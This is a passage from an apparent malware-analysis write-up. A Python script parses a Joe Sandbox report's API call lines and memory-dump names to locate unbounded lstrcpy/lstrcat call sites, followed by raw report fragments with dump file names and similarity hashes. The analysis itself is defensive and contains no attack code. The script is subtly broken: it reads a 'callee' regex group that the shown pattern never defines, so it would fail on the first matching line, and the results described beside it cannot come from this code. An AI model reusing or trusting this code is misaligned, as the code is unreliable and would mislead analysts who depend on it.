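    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 PAGE_* constants. ASSUMPTION: the fifth dotted field of an .sdmp name is the
# region protection; the report never says so, but 0x04/0x40/0x80 are the only values seen.
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}


def parse_api_refs(text):
    """Parse the report's API reference lines into dicts; lines that do not match are skipped."""
    sites = []
    for line in text.splitlines():
        m = API_REF.match(line.strip())
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        sites.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,                      # "?" marks an argument the sandbox could not resolve
            "ref": int(m.group("ref"), 16),
            "callee": int(m.group("callee"), 16) if m.group("callee") else None,  # None = direct call
        })
    return sites


def split_direct_and_inherited(sites):
    """Direct call sites of the function vs. sites the report attributes to each subcall."""
    direct = [s for s in sites if s["callee"] is None]
    inherited = defaultdict(list)
    for s in sites:
        if s["callee"] is not None:
            inherited[s["callee"]].append(s)
    return direct, dict(inherited)


def parse_dump_name(name):
    """Split an .sdmp name into fields. The fourth field is the region base: it lines up with
    the 'Offset: 006C0000' of the source file and with the consecutive region starts above."""
    fields = name.rsplit(".sdmp", 1)[0].split(".")
    base = int(fields[3], 16)
    protect = int(fields[4], 16)
    return {"name": name, "base": base, "protect": protect,
            "protect_name": PAGE_PROTECT.get(protect, hex(protect))}


def region_for(addr, dump_names):
    """Region with the highest base not above addr, or None if addr is below every region."""
    hit = None
    for r in sorted((parse_dump_name(n) for n in dump_names), key=lambda r: r["base"]):
        if r["base"] <= addr:
            hit = r
    return hit


def unbounded_copy_sites(sites):
    """lstrcpy/lstrcat copy up to the NUL terminator with no destination size; list those sites."""
    unbounded = {"lstrcpy", "lstrcpyA", "lstrcpyW", "lstrcat", "lstrcatA", "lstrcatW"}
    return sorted(s["ref"] for s in sites if s["api"] in unbounded)


if __name__ == "__main__":
    sites = parse_api_refs(SAMPLE_API_LINES)
    direct, inherited = split_direct_and_inherited(sites)
    print("direct call sites:", [hex(s["ref"]) for s in direct])
    for callee, group in inherited.items():
        print(f"via subcall {callee:#x}:", [hex(s["ref"]) for s in group])
    for ref in unbounded_copy_sites(sites):
        r = region_for(ref, SAMPLE_DUMPS)
        print(f"{ref:#x} unbounded copy in region {r['base']:#x} ({r['protect_name']})")
```

                                 Run on the two entries above, the inherited set for 006C1610 is exactly the direct call list of the second entry, which is how the report expresses that the first function calls 006C1610. Every site resolves to the 006C1000 region, whose dump name carries 0x40; if the protection reading is right that is an executable and writable region, consistent with the "changes PE section rights" signature in the overview.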
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                 • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 19b6b4a7356631758f13b4d49c98c8dd0d2768c54c0b807ade70ba85688bdcbb
                                • Instruction ID: d496baf819f82715dd3d514373fd61762038cf77e352591b3fcd8c33945fcbd8
                                • Opcode Fuzzy Hash: 19b6b4a7356631758f13b4d49c98c8dd0d2768c54c0b807ade70ba85688bdcbb
                                • Instruction Fuzzy Hash: 7B110A74A11B039BDB249F76D418E36B7F9FF46301708452DA89AC7B41EB34E851CB94